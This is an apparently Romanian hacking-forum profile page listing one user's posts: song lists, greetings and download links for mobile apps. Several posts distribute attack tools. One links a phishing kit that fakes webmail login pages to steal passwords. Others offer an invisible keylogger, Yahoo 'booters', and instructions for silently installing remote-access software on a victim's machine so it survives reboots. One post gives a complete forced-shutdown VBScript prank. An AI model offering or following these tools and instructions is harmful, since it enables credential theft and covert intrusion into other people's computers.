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Everything posted by AnON1m

  1. AnON1m

    5 songs a day

    Dido Mc - Un sfarsit inceput Grasu XXL & Mario - Nimeni de nicaieri EyDeea - Nu crede-n toti CritiC - Peste Lege Ceilalti - Nimic Intamplator
  2. Postati aici !
  3. AnON1m


    Counter-Strike Rullz !
  4. Parazitii - Visul lui Liviu
  5. AnON1m

    Yahoo booters

    Super bun site o gramada de bootere Download : http://irocs-kingdom.com
  6. scz :@ :@
  7. Elite Keylogger - Invisible Keystroke Recorder - Current version of Elite Keystroke Logger is 2.6 - You need to download ONLY 2.99 Mb - Elite Keylogger works under Windows 2000/XP - Trial version is fully-functional for only 7 days - Invisible Spyware for just USD 69.00 - Latest version was released on October 14, 2005 - Available build was compiled on November 7, 2005 - PAD file is available here - Manual is available online in HTML format Download: http://www.widestep.com/files/ek_setup.exe http://www21.fixdown.com/endown/un-ek26b-2...-2006-01-26.rar
  8. AnON1m


    Incearca`l .. e marfa
  9. PHP web script that allows you to choose a fake login page of MSN Messenger, Hotmail Yahoo or Google mail and log the stolen user/passes. All you need to get it to work is a PHP-SQL server, you can pop up the fake login pages from other sites and disable the URL bar to trick the victims, have fun. By Dark Developments http://rapidshare.de/files/19459591/Hoa ... 1.rar.html
  10. Ghost Radmin : http://rapidshare.de/files/21601433/ghostR...Radmin.rar.html Passworld : romania.hackerszone.org zice ca ar trebui sa instaleze silentios radminul pe un remote computer ...programul inca mai are bug-uri ...asigurati-va ca serverul va porni si dupa ce victima va da restart ...pur si simplu, dupa ce obtineti acces pe computerul victimei, puneti r_server.exe in startup inainte ca victima sa reseteze ...aaa shi inca ceva ...odata rulat programul ar trebui sa isi ia fisierele de care are nevoie pt rularea serverului de pe internet insa voi, baieti isteti, puteti shara un folder cu fisierele care trebuiesc downloadate, apoi setati serverul sa ia fisierele din computerul vostru (Ex. in loc de www.blabla.ro/r_server.exe puneti numecompfolderSharatr_server.exe )... Just Think Out Of The Box
  11. AnON1m


    Code: msgbox "Iesim si noi in oras la un suc??" msgbox "Zi tu unde ne intalnim!" msgbox "Hai ca fac eu cinste :)" msgbox "Tu imbraca-te ca am eu grija pe aici" msgbox "HAI CA ITI INCHID EU CALCULATORUL CA SA VII SIGUR! " Dim wshshell set wshshell = wscript.CreateObject("Wscript.Shell") wshshell.run "shutdown -s -f -t 20" copiezi ce scrie mai sus intr-un notepad, dai la File - Save As... - la File Name scrii haios.vbs si dai Save apoi il rulezi ca sa vezi cum functioneaza PS: "shutdown -s -f -t 20" poti sa pui de exemplu mai putin "shutdown -s -f -t 5"(ca sa se opreasca mai repede)
  12. Syntrax for Mobile Upto 8 stereo audio channels simultaneously (previously only 6) Playback of samples with bi-directional looping support Realtime sound synthesis with 15 sound generation effects Realtime effects like filters, morphs and echoes A built in small sample editor A full featured sequencer Dynamic playback options (songspeed, groove, muting etc..) Realtime instrument parameter changing A lot of preset songs and sounds for you to start working with User adjustable sound quality for slower PocketPC's/Mobile phones Memory card support A custom graphical user interface (knobs and dials) A heavily optimized sound core designed to give high performace on devices with low resources. MIDI and Wav export functions. http://rapidshare.de/files/12801020/Syn ... 9.rar.html
  13. ProfiMail v1.36 WORK WITH : Nokia 7650/7610/3650/N-Gage/6600, Siemens SX1, SendoX NEW ADDITIONS : 1.34 - Fixed program update on UIQ 1.35 - Visual notification for new mail 1.36 - Working on N-Gage QD http://rapidshare.de/files/12806639/Pro ... 6.rar.html
  14. wGreeting Birthday Edition v1.0 W-Greetings Birthday Edition: A unique and personal multimedia Birthday card which only you can create, by adding your own handwriting!! -Create unique, handwritten, birthday cards using your camera phone -Go beyond words: add a drawing, a scribble or any doodle you can imagine! -Choose from 4 original exclusive Birthday card designs Benefits: Let your handwriting show your emotions -Impress your family and friends with unique, personal Birthday cards -Go beyond typed text messaging: give more of yourself to those you love with the look and feel of a real Birthday card by MMS or e-mail -Simple and quick to create, requires no accessories – just point and shoot! Less than 250kb of memory for powerful personal greeting cards! A couple simple steps to your personal Birthday card: Let w-Greetings guide you! 1. Choose the exclusive birthday design you like 2. Write your message on a piece of paper with any pen 3. Shoot the text with the camera, and the w-Greetings does the rest! 4. Choose the telephone number or e mail address of the lucky receiver! 5. Send!! Your handwritten birthday wishes are delivered! Compatible devices Nokia 3650, Nokia 6600, Nokia 7650, Siemens SX-1 etc http://rapidshare.de/files/12807378/w-G ... S.rar.html
  15. CellTrack v1.11 Cost-effective and efficient tool to track several mobile phones in one central SQL database. The client program runs in a Series 60 phone, in the foreground or in the background. The program is able to connect to a Bluetooth GPS receiver and transmit the received GPS location data (NMEA-0183) to a central database via GPRS. You can configure the timers and events, which trigger the data send action. The data is sent in a compact UDP datagram, only a little over 100 GPRS bytes per message. This means that the data transfer costs are minimal compared to e.g. SMS. The central database is a powerful SQL engine, which can handle tens or even hundreds of mobile tracking targets. (Depending on the tracking frequency and resolution.) The database accumulates position data from the mobile phones being tracked. Each record in the database is identified by the IMEI code of the phone the data belongs to. The location data is collected to an industry standard SQL database. This makes it straightforward to integrate with the rest of your company data systems. You don't even need necessarily to have as many GPS receivers as tracked mobile phones, if a lower accuracy suffices and there are only a few places you want to have recognised. The location of the mobile phone can also be determined by the network cell id. You must first create a mapping from the cell ID to a geographical location. Unless you get the cell id location lists from your mobile operator, you can collect the data yourself by driving around the places you want to have recognised by the system and have Aspicore GSM Tracker and a Bluetooth GPS to record the GPS coordinates of the network cells. When the system is eventually being used, the mobile will report its network cell information to the system server by using Aspicore GSM Tracker. The server compares the network cell information to the accumulated data and converts it to an estimated geographical location. This way you can track your sales representatives, delivery men, children etc without them needing to carry a GPS receiver with them. The central database solution is not included in the trial version, but customers can use Aspicore's test server in the Internet for evaluation and testing. Aspicore GSM Tracker sends data to the server as plain ASCII characters in an UDP datagram. You can write the receiving end program yourself by using UDP sockets, if you wish. http://rapidshare.de/files/12807397/Cel ... _.rar.html
  16. <div class='quotetop'>QUOTE("T-Bone")</div> ii fi tu cristos
  17. AnON1m


    Bun Venit !
  18. AnON1m


    Kw3rLn Stie
  19. Bun Venit impure .. Speram sa postezi in continuare
  20. AnON1m


  21. AnON1m

    na si eu

    Welcome :/
  22. Bine ai venit joe_capitano ! Sper sa postezi in continuare
  23. AnON1m


    Bun Venit mc1
  24. AnON1m


    EnJoy your stay
  25. http://rapidshare.de/files/20612769/Y__ ... L.zip.html e detectabil :@
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